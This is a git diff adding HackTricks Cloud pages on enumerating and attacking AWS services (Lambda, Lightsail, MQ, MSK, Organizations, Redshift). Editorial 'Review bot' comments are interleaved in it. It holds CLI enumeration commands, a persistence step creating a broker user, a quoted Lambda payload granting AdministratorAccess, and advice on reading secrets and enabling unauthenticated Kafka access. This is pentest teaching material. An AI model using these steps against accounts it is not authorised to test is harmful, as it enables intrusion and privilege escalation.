possible lambda functions to execute: + +``` +aws 
--region us-west-2 --profile level6 lambda list-functions +``` + +![](<../../../.gitbook/assets/image (262).png>) + +A lambda function called "Level6" is available. Lets find out how to call it: + +```bash +aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 +``` + +![](<../../../.gitbook/assets/image (102).png>) + +Now, that you know the name and the ID you can get the Name: + +```bash +aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" +``` + +![](<../../../.gitbook/assets/image (237).png>) + +And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) + +`URL:`**`https://.execute-api..amazonaws.com//`** + +#### Other Triggers + +There are a lot of other sources that can trigger a lambda + +
+ +### Privesc + +In the following page you can check how to **abuse Lambda permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-lambda-privesc.md" %} +[aws-lambda-privesc.md](../aws-privilege-escalation/aws-lambda-privesc.md) +{% endcontent-ref %} + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md" %} +[aws-lambda-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/" %} +[aws-lambda-post-exploitation](../aws-post-exploitation/aws-lambda-post-exploitation/) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-lambda-persistence/" %} +[aws-lambda-persistence](../aws-persistence/aws-lambda-persistence/) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) +* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
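Review bot: the manual invoke example has a JSON syntax error, `'{"policy_names": ["AdministratorAccess], "user_name": "sdf"}'` is missing the closing quote after `AdministratorAccess`, so the CLI rejects the payload; it should read `["AdministratorAccess"]`. In the enumeration block `wget -O lambda-function.zip` has no URL: the intent is to feed it the `Code.Location` value returned by the preceding `get-function` line, so capture that value first (`URL=$(aws lambda get-function --function-name <name> --query 'Code.Location' --output text)`) and pass it to wget. The "Call Lambda function via URL" walkthrough is inconsistent: "Now, that you know the name and the ID you can get the Name" precedes a `get-stages` call that actually returns the stage name (`Prod` in the example), and the URL template `https://.execute-api..amazonaws.com//` has lost its placeholders, so spell them out as `<rest-api-id>`, `<region>`, `<stage>` and `<resource-path>`. The "Resource Policies" section announces two example policies ("this is the policy to allow anyone...", "Or this to allow an API Gateway to invoke it:") but no policy text follows either sentence in the hunk; include them as fenced JSON so they are searchable and copyable. Minor: "Java Correto" in the internal-extensions bullet should be "Corretto" as in the next bullet, and "as frequently as you wants" should be "as frequently as you want".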
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md new file mode 100644 index 0000000000..3d2778ee1d --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md @@ -0,0 +1,85 @@ +# AWS - Lightsail Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS - Lightsail + +Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ +It's a **minimal EC2 + Route53 + ECS**. + +### Enumeration + +```bash +# Instances +aws lightsail get-instances #Get all +aws lightsail get-instance-port-states --instance-name #Get open ports + +# Databases +aws lightsail get-relational-databases +aws lightsail get-relational-database-snapshots +aws lightsail get-relational-database-parameters + +# Disk & snapshots +aws lightsail get-instance-snapshots +aws lightsail get-disk-snapshots +aws lightsail get-disks + +# More +aws lightsail get-load-balancers +aws lightsail get-static-ips +aws lightsail get-key-pairs +``` + +### Analyse Snapshots + +It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). + +### Metadata + +**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. 
+ +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} +[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-lightsail-post-exploitation.md" %} +[aws-lightsail-post-exploitation.md](../aws-post-exploitation/aws-lightsail-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-lightsail-persistence.md" %} +[aws-lightsail-persistence.md](../aws-persistence/aws-lightsail-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
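Review bot: `aws lightsail get-instance-port-states --instance-name` is missing its value; add an `<instance-name>` placeholder so the line runs as shown. Unlike the KMS, Lambda and MQ pages in this change, this page has no `## References` section even though the "Analyse Snapshots" paragraph points readers to the EC2 and RDS pages; add one for consistency with the other service pages.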
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md new file mode 100644 index 0000000000..30e76cde66 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md @@ -0,0 +1,103 @@ +# AWS - MQ Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Amazon MQ + +### Introduction to Message Brokers + +**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. + +### AWS - RabbitMQ + +RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. + +### AWS - ActiveMQ + +Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: + +* Connect with clients written in JavaScript, C, C++, Python, .Net, and more. +* Leverage the **AMQP** protocol to integrate applications from different platforms. +* Use **STOMP** over websockets for web application message exchanges. +* Manage IoT devices with **MQTT**. +* Maintain existing **JMS** infrastructure and extend its capabilities. + +ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. 
+ +## Enumeration + +```bash +# List brokers +aws mq list-brokers + +# Get broker info +aws mq describe-broker --broker-id +## Find endpoints in .BrokerInstances +## Find if public accessible in .PubliclyAccessible + +# List usernames (only for ActiveMQ) +aws mq list-users --broker-id + +# Get user info (PASSWORD NOT INCLUDED) +aws mq describe-user --broker-id --username + +# Lits configurations (only for ActiveMQ) +aws mq list-configurations +## Here you can find if simple or LDAP authentication is used + +# Creacte Active MQ user +aws mq create-user --broker-id --password --username --console-access +``` + +{% hint style="warning" %} +TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) +{% endhint %} + +## Privesc + +{% content-ref url="../aws-privilege-escalation/aws-mq-privesc.md" %} +[aws-mq-privesc.md](../aws-privilege-escalation/aws-mq-privesc.md) +{% endcontent-ref %} + +## Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md" %} +[aws-mq-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) +{% endcontent-ref %} + +## Persistence + +If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. + +## References + +* [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) +* [https://activemq.apache.org/](https://activemq.apache.org/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
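Review bot: `aws mq create-user --broker-id --password --username --console-access` sits under "Enumeration" but it is a write operation that adds a broker user; it belongs under the "Persistence" heading below, which already describes creating a new privileged user (note that section talks about the RabbitMQ web console while the command's own comment says it creates an ActiveMQ user, so say which broker type each applies to), and its option values are missing, so add `<broker-id>`, `<password>` and `<username>` placeholders. The `{% hint %}` block that starts with "TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally" is reader-facing text; either track it as an issue or keep it but phrase it as an explicit open item. Spelling: "Creacte" should be "Create", "Lits" should be "List", and "qith" should be "with".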
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md new file mode 100644 index 0000000000..4e2cae9773 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md @@ -0,0 +1,125 @@ +# AWS - MSK Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Amazon MSK + +**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code. + +In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka. + +### **Types** + +There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless. + +From the point of view of an attacker you need to know that: + +* **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. +* **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. 
+ * Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled + +### Enumeration + +```bash +#Get clusters +aws kafka list-clusters +aws kafka list-clusters-v2 + +# Check the supported authentication +aws kafka list-clusters | jq -r ".ClusterInfoList[].ClientAuthentication" + +# Get Zookeeper endpoints +aws kafka list-clusters | jq -r ".ClusterInfoList[].ZookeeperConnectString, .ClusterInfoList[].ZookeeperConnectStringTls" + +# Get nodes and node enspoints +aws kafka kafka list-nodes --cluster-arn +aws kafka kafka list-nodes --cluster-arn | jq -r ".NodeInfoList[].BrokerNodeInfo.Endpoints" # Get endpoints + +# Get used kafka configs +aws kafka list-configurations #Get Kafka config file +aws kafka describe-configuration --arn # Get version of config +aws kafka describe-configuration-revision --arn --revision # Get content of config version + +# If using SCRAN authentication, get used AWS secret name (not secret value) +aws kafka list-scram-secrets --cluster-arn +``` + +### Kafka IAM Access (in serverless) + +```bash +# Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html +# Download Kafka +wget https://archive.apache.org/dist/kafka/2.8.1/kafka_2.12-2.8.1.tgz +tar -xzf kafka_2.12-2.8.1.tgz + +# In kafka_2.12-2.8.1/libs download the MSK IAM JAR file. 
+cd kafka_2.12-2.8.1/libs +wget https://github.com/aws/aws-msk-iam-auth/releases/download/v1.1.1/aws-msk-iam-auth-1.1.1-all.jar + +# Create file client.properties in kafka_2.12-2.8.1/bin +security.protocol=SASL_SSL +sasl.mechanism=AWS_MSK_IAM +sasl.jaas.config=software.amazon.msk.auth.iam.IAMLoginModule required; +sasl.client.callback.handler.class=software.amazon.msk.auth.iam.IAMClientCallbackHandler + +# Export endpoints address +export BS=boot-ok2ngypz.c2.kafka-serverless.us-east-1.amazonaws.com:9098 +## Make sure you will be able to access the port 9098 from the EC2 instance (check VPS, subnets and SG) + +# Create a topic called msk-serverless-tutorial +kafka_2.12-2.8.1/bin/kafka-topics.sh --bootstrap-server $BS --command-config client.properties --create --topic msk-serverless-tutorial --partitions 6 + +# Send message of every new line +kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.config client.properties --topic msk-serverless-tutorial + +# Read messages +kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning +``` + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-msk-privesc.md" %} +[aws-msk-privesc.md](../aws-privilege-escalation/aws-msk-privesc.md) +{% endcontent-ref %} + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md" %} +[aws-msk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) +{% endcontent-ref %} + +### Persistence + +If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**. 
+ +## References + +* [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
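Review bot: in aws-msk-enum.md the node listing repeats the service name, `aws kafka kafka list-nodes --cluster-arn` (on two lines), which the CLI rejects as an unknown command; it should read `aws kafka list-nodes --cluster-arn <cluster-arn>`. In the "Kafka IAM Access" block the four client.properties settings (starting with `security.protocol=SASL_SSL`) are pasted as bare lines inside a ```bash fence, where they are not valid shell; wrap them in a heredoc such as `cat > client.properties <<EOF` ... `EOF` so the snippet is copy-pasteable, and make the working directory consistent: the comment says the file goes in kafka_2.12-2.8.1/bin, but the preceding `cd kafka_2.12-2.8.1/libs` leaves the shell in libs while the later commands call kafka_2.12-2.8.1/bin/kafka-topics.sh relative to the extraction directory, so `--command-config client.properties` will not resolve. Smaller fixes: "node enspoints" should be "node endpoints", "SCRAN authentication" should be "SCRAM authentication", "Serverless only support IAM" should be "only supports IAM", the "### **Types**" heading is bold-wrapped unlike the other headings, and the Persistence sentence should read "enable unauthenticated access; if SASL/SCRAM authentication is used, read the password from the secret". Since the Types bullets state that a Provisioned cluster can only be made public when unauthenticated access is off, it is worth adding one line telling the reader that the ClientAuthentication and public-access settings returned by list-clusters are exactly what a defender should review and alert on.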
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md new file mode 100644 index 0000000000..06598159d9 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md @@ -0,0 +1,73 @@ +# AWS - Organizations Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Baisc Information + +AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. + +Key Points: + +* **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. +* **Resource Allocation**: It simplifies the process of allocating resources across the accounts. +* **Account Grouping**: Accounts can be grouped together, making management more streamlined. +* **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. + +You can find more information in: + +{% content-ref url="../aws-basic-information/" %} +[aws-basic-information](../aws-basic-information/) +{% endcontent-ref %} + +```bash +# Get Org +aws organizations describe-organization +aws organizations list-roots + +# Get OUs, from root and from other OUs +aws organizations list-organizational-units-for-parent --parent-id r-lalala +aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y + +# Get accounts +## List all the accounts without caring about the parent +aws organizations list-accounts +## Accounts from a parent +aws organizations list-accounts-for-parent --parent-id r-lalala +aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y + +# Get basic account info +## You need the permission iam:GetAccountSummary +aws iam get-account-summary +``` + +## References + +* https://aws.amazon.com/organizations/ + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
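Review bot: in aws-organizations-enum.md the section heading is misspelled, "## Baisc Information" should be "## Basic Information". The Key Points list says governance policies can be applied to accounts and groups, but the enumeration block never lists them; consider adding `aws organizations list-policies --filter SERVICE_CONTROL_POLICY` together with `describe-policy` and `list-targets-for-policy` next to the account and OU listing, so the SCPs that actually constrain a given account are visible during enumeration. The reference `* https://aws.amazon.com/organizations/` is a bare URL while every other page in this change uses the `[url](url)` link form; make it consistent.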
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md new file mode 100644 index 0000000000..13db530f05 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md @@ -0,0 +1,50 @@ +# AWS - Other Services Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Directconnect + +Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). + +``` +aws directconnect describe-connections +aws directconnect describe-interconnects +aws directconnect describe-virtual-gateways +aws directconnect describe-virtual-interfaces +``` + +## Support + +In AWS you can access current and previous support cases via the API + +``` +aws support describe-cases --include-resolved-cases +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
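Review bot: in aws-other-services-enum.md both code fences are untagged (plain ```) while every other page in this change tags them ```bash; tag them so they are highlighted consistently. The Directconnect sentence, "Allows to connect a corporate private network with AWS (so you could compromise an EC2 instance and access the corporate network)", is ungrammatical; rephrase as "Allows connecting a corporate private network to AWS, so a compromised EC2 instance may be able to reach the corporate network" and say what the four describe commands are for, namely learning whether such a link exists and which virtual interfaces cross it. For the Support section, `aws support describe-cases --include-resolved-cases` only works on accounts with a Business or Enterprise support plan and fails with a subscription error elsewhere; the page should say so, otherwise an empty result is read as "no cases". The sentence "In AWS you can access current and previous support cases via the API" is also missing its full stop.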
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md new file mode 100644 index 0000000000..3580f80fda --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md @@ -0,0 +1,125 @@ +# AWS - Redshift Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Amazon Redshift + +Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. + +**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted. + +Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. + +### KMS + +During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. + +The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. + +This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. + +Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. 
Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. + +This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. + +You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. + +### CloudHSM + +
